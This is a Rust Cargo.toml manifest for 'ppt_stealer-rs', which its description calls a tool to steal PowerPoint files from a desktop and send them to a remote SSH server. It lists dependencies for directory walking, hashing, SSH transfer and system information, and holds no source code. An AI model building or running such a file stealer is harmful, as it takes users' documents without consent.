[package]
name = "ppt_stealer-rs"
version = "0.3.0"
edition = "2021"
authors = ["Hammerklavier"]
description = "A tool to steal PowerPoint files from desktop to remote SSH server."

[cargo.release]
trace = false

[dependencies]
dirs = "=5.0.1"
clap = { version = "=4.5.23", features = ["derive"] }
log = "=0.4.22"
env_logger = "=0.9"
walkdir = "=2.5.0"
sha2 = "=0.10.8"
ssh2 = "=0.9.4"
ctrlc = "=3.4.5"
chrono = "=0.4.39"
sysinfo = "=0.33.0"
regex = "=1.11.1"
